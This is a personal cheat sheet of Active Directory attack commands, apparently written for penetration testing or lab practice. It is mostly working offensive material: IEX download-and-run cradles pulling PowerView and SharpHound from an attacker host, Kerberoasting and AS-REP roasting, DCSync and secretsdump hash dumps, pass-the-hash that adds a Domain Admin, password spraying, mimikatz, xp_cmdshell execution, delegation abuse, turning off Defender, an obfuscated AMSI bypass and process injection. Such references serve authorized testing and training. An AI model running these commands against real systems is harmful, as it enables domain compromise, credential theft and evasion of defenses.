Domain Enumeration + Exploitation
This is just a living document of things I have needed for domain enumeration/exploitation

POWERSPLOIT

Use the dev branch or PowerSploit. For an already incredible cheat sheet, check out HarmJ0y's.
IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')

Get Domain Users

Get-NetUser * -Domain corp.local | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset, lastlogontimestamp,accountexpires,admincount,userprincipalname, serviceprincipalname, mail,useraccountcontrol | Export-CSV users.csv

Get Domain Computers

Get-NetComputer * -Domain corp.local | Select-Object -Property dnshostname,operatingsystem,operatingsystemservicepack,lastlogontimestamp | Export-CSV computers.csv

Get Group Members

Get-DomainGroupMember -Identity "Helpdesk" | Select-Object membername

SPN Ticket Request (Kerberoast)

Get-DomainUser * -SPN | Get-DomainSPNTicket -OutputFormat Hashcat | Export-Csv .\ticket.csv -NoTypeInformation

Enumerate User DACLs

PS C:\> Get-DomainObjectAcl -Identity it_admin -ResolveGUIDs ? { $_.SecurityIdentifier -Match $(ConvertTo-SID burmat) }
AceType : AccessAllowed
ObjectDN : CN=it_admin,CN=Users,DC=BURMAT,DC=CO
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-2736429227-4547413232-2815246478-1130
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2736429227-4547413232-2815246478-1107
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed

Enumerate Network Shares

## scan an entire domain:
find-domainshare -computerdomain burmat.local
## narrow down scope, check permissions:
find-domainshare -computername websrv.burmat.local -computerdomain burmat.local -CheckShareAccess

Impersonate Another Domain User

PS C:\> $cred = New-Object System.Management.Automation.PSCredential "BURMAT\John.Smith", $(ConvertTo-SecureString "Spring2020!" -AsPlainText -Force);
PS C:\> find-domainshare -computername fs01.burmat.local -Credential $cred -computerdomain burmat.local -CheckShareAccess
WARNING: [Invoke-UserImpersonation] Executing LogonUser() with user: BURMAT\John.Smith
WARNING: [Invoke-RevertToSelf] Reverting token impersonation and closing LogonUser() token handle
Name Type Remark ComputerName
---- ---- ------ ------------
Accounting 0 fs01.burmat.local
Private 0 fs01.burmat.local
PS C:\windows\temp\.b> Invoke-UserImpersonation -Credential $cred
WARNING: [Invoke-UserImpersonation] Executing LogonUser() with user: BURMAT\John.Smith
6548
## now we can read the directory impersonating another user if permissions exist:
PS C:\> dir \\fs01.burmat.local\Private

Enumerate GPO's

"{7EA15487-7F5B-4CE3-C029-CEBE6FFE6D47}" | Get-DomainGPO

Reset Domain User Password

If you own the owner of another AD user object (WriteOwner, WriteDACL, GenericWrite, Owner, etc), you can reset the password with ease:
IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')
$user = 'DOMAIN\owner_acct';
$pass= ConvertTo-SecureString 'Password123!' -AsPlainText -Force;
$creds = New-Object System.Management.Automation.PSCredential $user, $pass;
$newpass = ConvertTo-SecureString '[email protected]' -AsPlainText -Force;
Set-DomainUserPassword -Identity 'DOMAIN\vuln_user' -AccountPassword $newpass -Credential $creds;
Or if you can set yourself as owner, the following will do:
IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')
Set-DomainObjectOwner -Identity it_admin -OwnerIdentity burmat
Add-DomainObjectAcl -TargetIdentity it_admin -PrincipalIdentity burmat
$newpass = ConvertTo-SecureString -String 'burmat123#x27; -AsPlainText -Force
Set-DomainUserPassword -Identity it_admin -AccountPassword $newpass

Add/Exploit DCSync Rights

Do you have WriteDACL to a domain? Give DCSync rights to an unprivileged domain user account:
Add-DomainObjectAcl -TargetIdentity "DC=burmatco,DC=local" -PrincipalIdentity useracct1 -Rights DCSync
And use these rights to dump the hashes from the domain:
meterpreter > dcsync_ntlm BURMATCO\\useracct1

IMPACKET

Thanks to the impacket toolset, exploiting misconfigurations in AD environments is made easier.

GetNPUsers.py

Attempt to get TGTs for users that have UF_DONT_REQUIRE_PREAUTH set:
python GetNPUsers.py -request -no-pass -dc-ip 10.10.10.123 burmat.co/ -usersfile users.txt

secretsdump.py

Attack a local offline copy of NTDS.dit:
./secretsdump.py -ntds /root/l00t/ntds.dit -system /root/l00t/systemhive LOCAL
Or you can attack a system remotely:
./secretsdump.py -just-dc-ntlm burmat.co/[email protected]

GetADUsers.py

Leverage this script to grab usernames via LDAP
./GetADUsers.py -all -no-pass -dc-ip 10.10.10.123 burmat.co/ | cut -d " " -f 1 | grep -Ev 'Name|Impacket|\-\-|\[' >> users.txt

CRACKMAPEXEC

Pass-the-Hash

Because hashes are just as good:
## create a new user
crackmapexec smb 10.10.10.123 -u 'administrator' -d 'burmat.co' -H 'd7452863d1e8e15241nn50ceb1ab9dfe' -x 'net user burmat Pwn3dPwn3d! /add /domain'
## add user to domain admins group
crackmapexec smb 10.10.10.123 -u 'administrator' -d 'burmat.co' -H 'd7452863d1e8e15241nn50ceb1ab9dfe' -x 'net group "Domain Admins" /add burmat /domain'

Password Spraying

Switch out usernames/passwords/targets with lists:
## to spray that Spring2020! and a list of users against a list of targets:
crackmapexec smb ~/targets.txt -u ~/users.txt -p Spring2020! -d burmat.co

Dumping Credentials

## mimikatz module
crackmapexec smb 10.10.10.123 -u 'administrator' -d 'burmat.co' -p 'S3cur3PW123' -M mimikatz -o COMMAND='privilege::debug'
## SAM database
crackmapexec smb 10.10.10.123 -u 'administrator' -d 'burmat.co' -p 'S3cur3PW123' --sam

POWERUPSQL

MSSQL Enumeration:

## basic instance information
Get-SQLInstanceLocal
## more verbose information:
Get-SQLServerInfo -Verbose -Instance SQLSRV\SQLEXPRESS
## crawl for databse links:
Get-SqlServerLinkCrawl -Verbose -Instance SQLSRV\SQLEXPRESS
Get-SqlServerLinkCrawl -Verbose -Instance SQLSRV\SQLEXPRESS -Query "select name from master..sysdatabases" | Select-Object -ExpandProperty CustomQuery

Enable xp_cmdshell / Execute Commands

## enable xp_cmdshell:
Get-SQLQuery -Instance SQLSRV\SQLEXPRESS -query "EXECUTE('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT ""sqlsrv.burmat.local"""
## test rce:
Get-SQLServerLinkCrawl -Instance "SQLSRV\SQLEXPRESS" -Query "exec master..xp_cmdshell 'whoami'" | Select-Object -ExpandProperty CustomQuery

KERBEROS

Brute Usernames with Nmap

nmap -v -Pn -p 88 --script krb5-enum-users.nse --script-args "realm='burmat.co', userdb='users.txt'" 10.10.10.123

GenericWrite to Host + User SPN = PWN

If we have GenericWrite privileges over a host and we are a user that has an SPN, we can write our SID to the msDS-AllowedToActOnBehalfOfOtherIdentity property against the AD object and forge tickets as anyone we like. You can read more about it here: https://alsid.com/company/news/kerberos-resource-based-constrained-delegation-new-control-path
## we can write our delegation attribute to the DC with the following:
$UserSid = Get-DomainUser svc_burmat -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($UserSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer websrv.burmat.local | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
## now we can use rubeus to forge tickets as anyone we want:
./rubeus.exe s4u /user:svc_burmat /ticket:doIFFDCCBRCg... SNIP .. /impersonateuser:administrator /msdsspn:cifs/websvr.burmat.local /ptt

Kerberoasting:

Rubeus:

./rubeus.exe kerberoast /creduser:burmat.co\xsvc /credpassword:S3cur3PW123 /outfile:user.hash

Impacket:

./GetUserSPNs.py -request -dc-ip 10.10.10.123 burmat.co/xsvc:S3cur3PW123
hashcat -m 13100 hash.txt -a 0 /usr/share/wordlists/rockyou.txt --force

PowerView:

IEX(New-Object Net.WebClient).downloadString('http://10.10.15.123/ps/PowerView.ps1');
$securePassword = ConvertTo-SecureString 'S3cur3PW123' -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential('burmat.co\xsvc', $securePassword);
Get-DomainUser -Credential $credential -Server dc01.burmat.co -SPN | Get-DomainSPNTicket -Credential $credential -OutputFormat Hashcat

Attacking spoolss ("The Printer Bug")

From a host with unconstrained delegation, "the printer bug" and dementor.py can be used to cause a TGT relay from the target host to us running responder, so we can generate a TGS for any user on that target host:
## set up a relay with responder:
responder -I tun0 --lm # tun0 = 10.10.15.123
## execute exploit through:
proxychains python dementor.py -u xsvc -p 'S3cur3PW123' -d 'burmat.co' 10.10.15.123 10.10.10.123

BLOODHOUND

Ingestor Launch

IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.123/ps/SharpHound.ps1');
Invoke-BloodHound -CollectionMethod All -CompressData -SkipPing;

LDAP QUERIES

Below are some useful LDAP queries that will help you enumerate a system. Some of them require a valid username/password to get more information. My go-to for these queries is ldapsearch.
Null session:
ldapsearch -x -h 10.10.10.123 -D '' -w '' -b "DC=BURMAT,DC=CO"
Authenticated:
ldapsearch -LLL -x -H ldap://burmat.co -D "svc-burmat" -w "burmat123quot; -b "dc=burmat,dc=co" "<LDAP QUERY HERE>"

Domain Usernames

Get usernames into a list by enumerating user objects:
ldapsearch -x -h burmat.co -b "dc=burmat,dc=co" -s sub "(objectclass=user)" | grep sAMAccountName | cut -d " " -f 2 > users.txt

ASREPRoast Accounts

## ldap filter to find accounts susceptible to this:
"(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"
## generate a list of user accounts and use impacket to exploit:
python GetNPUsers.py -request -no-pass -dc-ip 10.1.1.123 burmat.co/ -usersfile users.txt
## and if you get a ticket, you can crack it:
hashcat -m 18200 -a 0 --force user.hash /usr/share/wordlists/rockyou.txt

User Account Objects with SPNs

"(&(&(servicePrincipalName=*) (UserAccountControl:1.2.840.113556.1.4.803:=512)) (!(UserAccountControl:1.2.840.113556.1.4.803:=2)))"
## if you get valid domain credentials, you can dump them w/ impacket for offline cracking:
python GetUserSPNs.py -request burmat.co/svc-burmat:burmat123$

User and Computers with Unconstrained Delegation

# user:
"(&(&(objectCategory=person) (objectClass=user)) (userAccountControl:1.2.840.113556.1.4.803:=524288))"
# computer:
"(&(objectCategory=computer) (objectClass=computer) (userAccountControl:1.2.840.113556.1.4.803:=524288))"

Domain Administrators

"(&(objectClass=user) (memberof:1.2.840.113556.1.4.1941:=CN=Domain Admins,CN=Users,DC=burmat,DC=co))"

Group Policies

"objectClass=groupPolicyContainer"

EVADING AV

Checking Status

# is av enabled:
PS C:\> Get-MpComputerStatus
# applocker rules:
PS C:\> $a = Get-ApplockerPolicy -effective
PS C:\> $a.rulecollections
# constrained?:
PS C:\> $ExecutionContext.SessionState.LanguageMode

PowerShell Bypass with 32-bit

PowerShell disabled for you? Try running the 32-bit copy of it:
C:\windows\syswow64\windowspowershell\v1.0\powershell whoami

Writable Folders for Bypassing Execution Control

Try putting your payload in one of the following directories:
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing

Turning Off Defender's RTM

PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus

AMSI Bypass

PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)

PROCESS ELEVATION (via SeDebugPrivilege)

If you run whoami /priv and you see SeDebugPrivilege set to Enabled, you can assume you already have SYSTEM.
One way of doing it, is using decoder's psgetsys.ps1 script once you have a good idea on a PID to inject:
. .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(7864,'C:\temp\burmat443.exe');
You can also gain a MSF session and use the module windows/manage/payload_inject with a PID of your choice.

REMOTE DESKTOP

Enable RDP

PS C:\> Set-itemproperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" -value 0
PS C:\> Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" -value 1
PS C:\> Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

MISCELLANEOUS

# list shared folders
PS> Get-WmiObject -Class Win32_Share -Computer dc1.burmat.co
Copy link
On this page
POWERSPLOIT
Get Domain Users
Get Domain Computers
Get Group Members
SPN Ticket Request (Kerberoast)
Enumerate User DACLs
Enumerate Network Shares
Impersonate Another Domain User
Enumerate GPO's
Reset Domain User Password
Add/Exploit DCSync Rights
IMPACKET
GetNPUsers.py
secretsdump.py
GetADUsers.py
CRACKMAPEXEC
Pass-the-Hash
Password Spraying
Dumping Credentials
POWERUPSQL
MSSQL Enumeration:
Execute DB Query via MSSQL Link
Enable xp_cmdshell / Execute Commands
KERBEROS
Brute Usernames with Nmap
GenericWrite to Host + User SPN = PWN
Kerberoasting:
Attacking spoolss ("The Printer Bug")
BLOODHOUND
Ingestor Launch
LDAP QUERIES
Domain Usernames
ASREPRoast Accounts
User Account Objects with SPNs
User and Computers with Unconstrained Delegation
Domain Administrators
Group Policies
EVADING AV
Checking Status
PowerShell Bypass with 32-bit
Writable Folders for Bypassing Execution Control
Turning Off Defender's RTM
AMSI Bypass
PROCESS ELEVATION (via SeDebugPrivilege)
REMOTE DESKTOP
Enable RDP
MISCELLANEOUS